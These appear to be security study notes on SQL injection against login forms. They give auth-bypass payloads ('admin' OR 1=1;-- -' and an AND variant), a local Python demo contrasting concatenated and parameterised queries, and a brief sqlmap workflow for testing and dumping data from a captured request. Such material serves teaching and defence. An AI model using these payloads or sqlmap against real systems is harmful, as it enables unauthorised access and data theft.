SQL Injection

Forms are sometimes vulnerable to SQL injection

This happens because developers use unsafe queries like the following to log someone in:

select username from users where username = '[user input]' and password = '[user input]'

We can exploit this by breaking out of their single quotes, submitting something like the following as the username:

admin' OR 1=1;-- -

This turns their unsafe query into the following:

select username from users where username = 'admin' OR 1=1;-- - and password = 'whatever'

This means: select the username from users where the username is admin OR 1=1 (in other words, always true); the -- then comments out the rest of the statement, including the password check. This will log us in as the first user that is returned.

If we know a username and we want to log in as them, we can use a similar attack with the AND keyword:

admin' AND 1=1;-- -

Thus making the query:

select username from users where username = 'admin' AND 1=1;-- - and password = 'whatever'

This means: select the username from users where the username is admin AND 1=1 (in other words, true); the -- then comments out the rest of the statement, including the password check. This will log us in as the first user with the username admin.
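To see why the concatenated query fails and a parameterised one does not, here is an added example (not from the original notes) that runs the payloads above against an in-memory SQLite database seeded with constructed sample users; the users table layout and the login_unsafe / login_safe helpers are assumptions made for the demo.

```python
import sqlite3

# Constructed sample data for the demo; not credentials from any real system.
CONSTRUCTED_USERS = [("alice", "alice-pw"), ("admin", "admin-pw")]


def make_db():
    """In-memory SQLite database seeded with the constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (username text, password text)")
    conn.executemany("insert into users values (?, ?)", CONSTRUCTED_USERS)
    return conn


def login_unsafe(conn, user, pw):
    """The pattern from the notes: user input spliced into the SQL text.
    A quote in `user` closes the string literal, so the rest of the
    input is parsed as SQL. Returns the matched username or None."""
    sql = f"select username from users where username = '{user}' and password = '{pw}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, user, pw):
    """Same query with bound parameters: the driver passes the values
    separately from the SQL text, so quotes and comments in the input
    stay plain characters in the value and never change the query."""
    sql = "select username from users where username = ? and password = ?"
    row = conn.execute(sql, (user, pw)).fetchone()
    return row[0] if row else None


def demo():
    """Run both login functions against the page's payloads."""
    conn = make_db()
    or_payload = "admin' OR 1=1;-- -"    # OR bypass: first row wins
    and_payload = "admin' AND 1=1;-- -"  # AND bypass: targets a known user
    return {
        "unsafe_wrong_password": login_unsafe(conn, "admin", "whatever"),
        "unsafe_or_bypass": login_unsafe(conn, or_payload, "whatever"),
        "unsafe_and_bypass": login_unsafe(conn, and_payload, "whatever"),
        "safe_or_bypass": login_safe(conn, or_payload, "whatever"),
        "safe_and_bypass": login_safe(conn, and_payload, "whatever"),
        "safe_valid": login_safe(conn, "admin", "admin-pw"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Note that the OR payload logs the unsafe version in as alice, the first row in the table, while the AND payload picks admin specifically, exactly as the notes describe.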

Sqlmap

Sqlmap can do a lot of the heavy lifting for us, and can also test for SQLi in applications. The simplest way is to grab a copy of the login request from Burp Suite, Caido, or something similar and save it to a file. For this example, that will be login.req.

Testing for SQLi

sqlmap -r login.req --batch

Finding the Technique

There are various types of SQL injection technique. We've discovered a boolean-based blind injection, so we can tell sqlmap to test for that technique specifically:

Finding Boolean

Specifying the technique makes this a bit faster, as does raising the level of aggressiveness. With a boolean injection, being more aggressive is fine.

Dumping data

Now that we've confirmed there's a boolean-based blind injection, we can start dumping some data.
